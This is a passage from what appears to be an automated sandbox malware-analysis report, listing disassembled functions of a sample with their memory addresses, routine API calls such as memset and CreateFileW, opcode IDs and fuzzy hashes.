                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: BoundaryDeleteDescriptor
                                                                                          • String ID:
                                                                                          • API String ID: 3203483114-0
                                                                                          • Opcode ID: a254ae6461982710f214ef371e6958c5aa805ed684c97477969f0ef3905f567d
                                                                                          • Instruction ID: cbc22edb41fb1985c78d2cbbdab10c859c7517f5d6fe8c6b4bda9050ee92bf7f
                                                                                          • Opcode Fuzzy Hash: a254ae6461982710f214ef371e6958c5aa805ed684c97477969f0ef3905f567d
                                                                                          • Instruction Fuzzy Hash: 1611A722E09542C1E626AB27F5442BEE320EF987A5FC08032CF4D07394CE3DE4D68314
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B74E32 Relevance: 1.5, APIs: 1, Instructions: 210COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcmpmemset
                                                                                          • String ID:
                                                                                          • API String ID: 1065087418-0
                                                                                          • Opcode ID: e643db03902e57b74c707a384f69033d4ef5d921940582c8fdbc008cb60f64c4
                                                                                          • Instruction ID: cb324fbd49056d71e934265fa8e15b6de819aa75985a54fd176970e1633ab131
                                                                                          • Opcode Fuzzy Hash: e643db03902e57b74c707a384f69033d4ef5d921940582c8fdbc008cb60f64c4
                                                                                          • Instruction Fuzzy Hash: 0D91B126A18B8181E7119B2DA4413B9F7A0FF99794F548326EFCD63BA4EF38D195C304
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C63940 Relevance: 1.4, APIs: 1, Instructions: 170COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2fec1f1775a180443302ac4f8fd297af15c97914e787d6206479efaa22412a9b
                                                                                          • Instruction ID: a2ae982b77806a90f9f0b17c024a669447b223444f1042b93c1db290be84b486
                                                                                          • Opcode Fuzzy Hash: 2fec1f1775a180443302ac4f8fd297af15c97914e787d6206479efaa22412a9b
                                                                                          • Instruction Fuzzy Hash: 3C61CD66B14B55D4EB11EBA5E8043EDA770BF48BA8F844572DE4D23744CF38D586C324
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C64B30 Relevance: 1.4, APIs: 1, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFilePrivilegeRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1039867377-0
                                                                                          • Opcode ID: 3d790efb686255617a61a2b793d8954c1eafda8ff926d208c3f58a0a8ec757a2
                                                                                          • Instruction ID: 6c8e8d057b9199e616ea6311d578e2be109d0279a66e69c0e016b45d00e10e68
                                                                                          • Opcode Fuzzy Hash: 3d790efb686255617a61a2b793d8954c1eafda8ff926d208c3f58a0a8ec757a2
                                                                                          • Instruction Fuzzy Hash: DC41B062E09A61D8FB11EB66E8007ADF760BF48B98F948675DE1C23794CF38D486C254
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768D81024 Relevance: 1.3, APIs: 1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000000,00007FF768D80A78,?,?,?,?,00000000,00000000), ref: 00007FF768D810FC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: 62dfba892468aa2a9f6376dcad028e8cf291e954beae91bb955472914c651a36
                                                                                          • Instruction ID: fa4423a5c6d3f5b4916b9b62c765f2b37cc9e2ad336eb3be21043673a9b11e8c
                                                                                          • Opcode Fuzzy Hash: 62dfba892468aa2a9f6376dcad028e8cf291e954beae91bb955472914c651a36
                                                                                          • Instruction Fuzzy Hash: 56318F76A08682C6EB51EF2698006B9F7A0FF88B94F990030DE5C47355DF38E44E8728
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C97529 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3510742995-0
                                                                                          • Opcode ID: c6c05a17f236156f3e64a002becce1cefde7811b04d272240db3eef4a92a3cec
                                                                                          • Instruction ID: ac2017b90f6b96d3cf38a16343f64b32832cb6fc5e5106bf5075a24a866bbd35
                                                                                          • Opcode Fuzzy Hash: c6c05a17f236156f3e64a002becce1cefde7811b04d272240db3eef4a92a3cec
                                                                                          • Instruction Fuzzy Hash: 27018F62A09646C1EBA5AF12F805369E660FB89BD4FC08272DE5C07384EF3CC596C710
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B754E5 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF768C63650: CreateFileW.KERNEL32 ref: 00007FF768C637AB
                                                                                            • Part of subcall function 00007FF768C63650: RtlReleasePrivilege.NTDLL(?,?,?,?,?,00000008,?,00000000,?,00007FF768C671CD), ref: 00007FF768C637E5
                                                                                          • HeapFree.KERNEL32 ref: 00007FF768B75550
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFileFreeHeapPrivilegeRelease
                                                                                          • String ID:
                                                                                          • API String ID: 3365866153-0
                                                                                          • Opcode ID: 09ba284ae1d4818a9cf6c9b1d5ba7ada95d4206824907e6e7dc3db2f4d87d326
                                                                                          • Instruction ID: c9ff4800339946affb5f286660bb07e5ff71b47bee33e2806370171f07e22ae6
                                                                                          • Opcode Fuzzy Hash: 09ba284ae1d4818a9cf6c9b1d5ba7ada95d4206824907e6e7dc3db2f4d87d326
                                                                                          • Instruction Fuzzy Hash: 2C01A763609785C7E3819F699A0039DA7A1BB5CBD4F448233DE4D57311DF38D18AD319
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BF799F Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3510742995-0
                                                                                          • Opcode ID: c14c2b10462b29363d1973fce3e17da34c05ac84b29d014387411cd4b4c93da2
                                                                                          • Instruction ID: 1a93e3fb70e5ad125c9f36ac8a76c064e6040f853529b42999c696ba7f91e0ec
                                                                                          • Opcode Fuzzy Hash: c14c2b10462b29363d1973fce3e17da34c05ac84b29d014387411cd4b4c93da2
                                                                                          • Instruction Fuzzy Hash: 50F0A752B0469492AC089B279D4409CD321BF0DFD0A9C8471DF0C47B91CF78D0A38318
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768D64B28 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140(?,?,00000001,00007FF768D8F123,?,?,?,00007FF768D9A608,?,?,?,?,00000000,00007FF768D9995C), ref: 00007FF768D64B59
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: bef9e7042bb45f2ef55c6ff288dd895721d172fc8f1ba6abfe1148698a1da408
                                                                                          • Instruction ID: 5a14eb1876e942f88be899384abd902a69060c6bf3555b03886fbc5fd11252c4
                                                                                          • Opcode Fuzzy Hash: bef9e7042bb45f2ef55c6ff288dd895721d172fc8f1ba6abfe1148698a1da408
                                                                                          • Instruction Fuzzy Hash: 3CE04840F09A86C0BD28B69B616117DC1414F4CBC0F8C4034AD1D17786DE2CE4944238
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768D7F0A0 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140(?,?,00000002,00007FF768D5D79C,00000000,?,?,00007FF768D082D9,?,?,?,00007FF768DA3D81), ref: 00007FF768D7F0C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: c4950280a3109a044ef5d0ed994e80af9c93e70dc0a08891357eb738f7529bbd
                                                                                          • Instruction ID: 9e2ba7cb49d43f88eea905dc38a59eb588552f9fae3cc21e361fb3de74177b1e
                                                                                          • Opcode Fuzzy Hash: c4950280a3109a044ef5d0ed994e80af9c93e70dc0a08891357eb738f7529bbd
                                                                                          • Instruction Fuzzy Hash: ADD05E41F197C680EE14B7A771454B9C1919F8DBC0B8C8038AE0C0BB86EE3CE4948728
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%